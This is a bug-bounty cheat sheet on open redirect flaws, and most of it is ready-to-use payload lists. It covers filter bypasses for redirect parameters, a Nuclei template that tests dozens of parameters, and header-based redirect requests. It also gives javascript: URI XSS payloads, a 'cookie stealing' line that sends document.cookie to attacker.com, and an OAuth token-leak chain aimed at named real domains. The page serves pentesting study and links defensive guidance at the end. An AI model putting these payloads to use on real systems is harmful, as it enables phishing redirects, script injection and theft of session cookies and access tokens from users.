Open Redirection

Open Redirection

You should be looking for open URL redirects in the following areas of your target:

• Sign in & register pages

• Sign out application route or API endpoint

• Password resets (inspect the generated token link too as it may contain a redirect parameter)

• Profile account page

• Email verification links

• Error pages

• Any important action within the app that requires multiple steps

One-Liner

cat waybacks.txt | \ 
sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \
httpx -silent -mc 301,302,307,308 -location

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Payloads

loxs/payloads/or.txt at main · coffinxp/loxsGitHub

https://github.com/payloadbox/open-redirect-payload-listgithub.com

Bug-Bounty-Methodology/Open Redirect.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

https://evil.com - ❌
https:evil.com ✅

# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com
//attacker․com//%2F

# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com

# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com

# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company                                  # .company is a valid TLD
https://attacker.com%E3%80%82example.com                 # URL encoded Chinese dot
attacker%E3%80%82com

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//google․com//%2F
//\google.com
/\vicitm.om:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/

Parameter Pollution

/?next=target.com&next=evil.com

Creating folder as victim domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/mass_48_open_redirect_check.yaml

id: mass_48_open_redirect_check
info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium
requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"
      - type: status
        status:
          - 301
          - 302
          - 303
          - 304
          - 307
          - 308

XSS in Login Page

http://login.target.com/return_url=sbsbHsjdbdsbsb=

XSS in Login Page

Header Based Open Redir

curl -v http://client456.startup.io \
  -H "X-Forwarded-Host: evil.com" \
  -H "X-Forwarded-For: evil.com" \
  -H "X-Forwarded-Scheme: http" \
  -H "Host: originaldomain.startup.io"

DOM Based redirect - XSS

XSS

GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com

# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)
javascript://target.com/%E2%80%A8alert(1)


java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascriptpjavascriptt:confirm`0`

Cookie Stealing

https://accounts.reddit.com/?dest=javascript:fetch('//attacker.com?c='+btoa(document.cookie))

URL Validation Bypass

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

OAuth - Open Redirection to Token Leak

Vulnerable endpoint:

https://docs.playstation.com/redirect/?target=https://evil.com

Find a token in the URL - OAuth:

https://my.playstation.com/?access_token=XYZ123&state=abc

That access_token=XYZ123 was visible in the URL, which means it could be leaked via the Referer header if this page redirected the browser somewhere else.

Smuggle the Token via Referer

https://my.playstation.com/login/oauth?redirect_uri=https://docs.playstation.com/redirect/?target=https://evil.com

Referer: https://my.playstation.com/?access_token=XYZ123&state=abc

Open Redirect + Referer Header = $3,000 Access Token LeakMedium

OAuth / Okta Misconfiguration

Tools

Go-recon - gr-openredirects:

GitHub - D3Ext/go-recon: External recon toolkitGitHub

GitHub - 4osp3l/RedirH4x: A python-based vulnerability scanner designed to identify open redirect flaws in website applications.GitHub

GitHub - rootDR/ex-redirect: ex-redirect — An automated open redirect scanner using Wayback Machine archives. Supports subdomain grouping, live URL filtering, and WordPress path ignoring. Built for bug bounty hunters and security researchersGitHub

GitHub - r0075h3ll/Oralyzer: Open Redirection AnalyzerGitHub

GitHub - cujanovic/Open-Redirect-Payloads: Open Redirect PayloadsGitHub

GitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Resources

Open redirection (reflected)portswigger.net

Open redirect vulnerability | Tutorials & examples | Snyk LearnSnyk Learn

Unvalidated Redirects and Forwards - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org

What and How to prevent are Open Redirect VulnerabilitiesIntigriti

Open URL Redirect: Advanced Exploitation GuideIntigriti